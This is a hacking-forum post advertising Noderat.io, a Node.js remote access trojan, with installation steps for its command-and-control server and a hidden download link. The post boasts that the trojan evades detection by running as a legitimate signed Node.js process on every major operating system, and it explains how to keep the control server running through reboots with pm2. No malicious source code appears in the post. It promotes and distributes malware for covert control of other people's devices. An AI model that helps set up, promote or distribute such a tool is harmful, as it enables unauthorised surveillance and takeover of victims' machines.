Jump to content
YOUR-AD-HERE
HOSTING
TOOLS

Locked Node JS Shell


Diabl0

Recommended Posts

This is the hidden content, please

 

 

ABOUT

Noderat.io is full coded in nodejs (web server and client), it use socket.io to exchange data between server and client.

Noderat.io is not detectable because it's signed with nodejs process recognized as legit application and it can run on all OS without modifications of source code because nodejs is multi platform (Windows all version, Mac OS, linux, Android, etc).

 

How To Install

- Install NodeJS and NPM :

This is the hidden content, please

- Install MySql.

- Clone the depot from the dl that will be provided

- Use the dump of database located here : "nodeRat.Io/_database/noderatio.sql" to create the database.

- Open a terminal and go in "nodeRat.Io/cloud" then write "npm install" to download all plugin required to run the cloud.

- Already in terminal write "node server.js" to run the cloud.

- Open your browser and go at http://127.0.0.1:8080/

- Login as admin with [email protected]:123456

- To config the connexion to database and port of webserver you can edit : "nodeRat.Io/cloud/routes/config.js"

 

To demonize and put the cloud as service (auto restart if server stop, reboot crash) we can use pm2:

- Install pm2 with npm: npm install -g pm2

- Start the cloud with pm2: "pm2 start server.js --name NodeRatIoCloud" (the cloud is now demonized it will restart if crash append)

- To save the process demonized as service just write : "pm2 save" (cloud will now restart automaticaly after a reboot)

- To stop the process demonized : pm2 stop NodeRatIoCloud

- To get list of process demonized with lot of info : pm2 list

- To see logs of process : pm2 logs NodeRatIoCloud

 

Download lInk:

[HIDE-THANKS]

Link:

This is the hidden content, please

[/HIDE-THANKS]

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.